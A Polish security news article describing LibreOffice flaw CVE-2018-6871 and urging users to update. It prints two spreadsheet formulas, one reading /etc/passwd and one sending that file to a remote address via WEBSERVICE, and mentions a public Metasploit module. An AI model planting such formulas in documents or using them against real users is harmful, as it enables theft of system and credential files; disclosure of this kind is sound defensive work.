Poważna luka w LibreOffice: każdy może pobierać pliki z Twojego dysku

22 lutego, 2018

Luka w LibreOffice CVE-2018-6871 dla wersji przed 5.4.5 i przed 6.0.1 dotyczy funkcji WEBSERVICE, z której korzystają MS Excel 2013 i MS Excel 2016, a także dokumenty LibreOffice Calc. Metoda ta ze 100% skutecznością pozwala w sposób niewidoczny dla użytkownika wstrzyknąć lokalne pliki do dokumentu lub wysłać napastnikowi np. zawartość plików z systemu Linux „/etc/passwd” czy chociażby „/.ssh/*”. Użycie tego samego triku oraz protokołów w adresie URL "ftp[:]//" lub „file[:]//” jest tak samo skuteczne w systemach Windows i macOS z zainstalowanym oprogramowaniem LibreOffice w podatnych wersjach.

Do odczytania zawartości dowolnego pliku na dysku można posłużyć się złośliwym dokumentem z zaszytym poleceniem:

=WEBSERVICE("/etc/passwd")

W podobny sposób można wysłać ten plik na zdalny serwer:

=WEBSERVICE("http://localhost:6000/?q=" & WEBSERVICE("/etc/passwd"))

Poważna luka w LibreOffice

Podatne są nie tylko dokumenty XLS generowane przez Libre Office Calc. Dal innych formatów np. DOC lub ODT wystarczy osadzić obiekt z LibreOffice Calc w innym dokumencie. Metoda została przetestowana i dołączona do pobrania w postaci exploita, który publicznie dostępny jest gotowy do zaimportowania do Metasploita.

Użytkownicy pakietu biurowego LibreOffice powinni jak najprędzej zaktualizować oprogramowanie do wersji stabilnych: 5.4.5 lub 6.0.1.

Pozostałe wszystkie warianty LibreOffice niezależnie od systemu operacyjnego mogą poważnie wpłynąć na bezpieczeństwo organizacji i użytkowników indywidualnych. Osoba atakująca, która wyśle ofierze spreparowany dokument, może pozyskać niemal dowolny plik z systemu operacyjnego. Warunek jest tylko jeden — do kradzieży pliku potrzebna jest wiedza o jego lokalizacji oraz uruchomienie złośliwego dokumentu. Dla plików systemowych lub konfiguracyjnych jest to bardzo łatwe do wykonania.

Czy ten artykuł był pomocny?

Oceniono: 0 razy

Picture of Adrian Ścibor

Adrian Ścibor

W ramach działań związanych z cyberbezpieczeństwem odpowiada w AVLab za przeprowadzanie testów rozwiązań ochronnych przed zagrożeniami. Opracowuje strategie oraz narzędzia, które pomagają w ochronie danych i systemów przed cyberatakami. Współuczestnik międzynarodowej grupy non-profit AMTSO, która zrzesza ekspertów IT.
Picture of Adrian Ścibor

Adrian Ścibor

W ramach działań związanych z cyberbezpieczeństwem odpowiada w AVLab za przeprowadzanie testów rozwiązań ochronnych przed zagrożeniami. Opracowuje strategie oraz narzędzia, które pomagają w ochronie danych i systemów przed cyberatakami. Współuczestnik międzynarodowej grupy non-profit AMTSO, która zrzesza ekspertów IT.

PODZIEL SIĘ:

guest
0 komentarzy
najstarszy
najnowszy oceniany
Inline Feedbacks
View all comments

Zapisz się na newsletter

Informacje o cyberbezpieczeństwie prosto na skrzynkę pocztową!

Dodatkowo otrzymasz poradnik „Jak bezpiecznie funkcjonować w cyfrowym świecie”

[ninja_tables id=”27481″]

\r\n <\/div>\r\n<\/div>\r\n","isUserRated":"0","version":"7.6.29","wc_post_id":"18765","isCookiesEnabled":"1","loadLastCommentId":"0","dataFilterCallbacks":[],"phraseFilters":[],"scrollSize":"32","is_email_field_required":"1","url":"https:\/\/avlab.pl\/wp-admin\/admin-ajax.php","customAjaxUrl":"https:\/\/avlab.pl\/wp-content\/plugins\/wpdiscuz\/utils\/ajax\/wpdiscuz-ajax.php","bubbleUpdateUrl":"https:\/\/avlab.pl\/wp-json\/wpdiscuz\/v1\/update","restNonce":"08556e041e","is_rate_editable":"0","menu_icon":"https:\/\/avlab.pl\/wp-content\/plugins\/wpdiscuz\/assets\/img\/plugin-icon\/wpdiscuz-svg.svg","menu_icon_hover":"https:\/\/avlab.pl\/wp-content\/plugins\/wpdiscuz\/assets\/img\/plugin-icon\/wpdiscuz-svg_hover.svg"}; var wpdiscuzUCObj = {"msgConfirmDeleteComment":"Are you sure you want to delete this comment?","msgConfirmCancelSubscription":"Are you sure you want to cancel this subscription?","msgConfirmCancelFollow":"Are you sure you want to cancel this follow?","additionalTab":"0"}; -->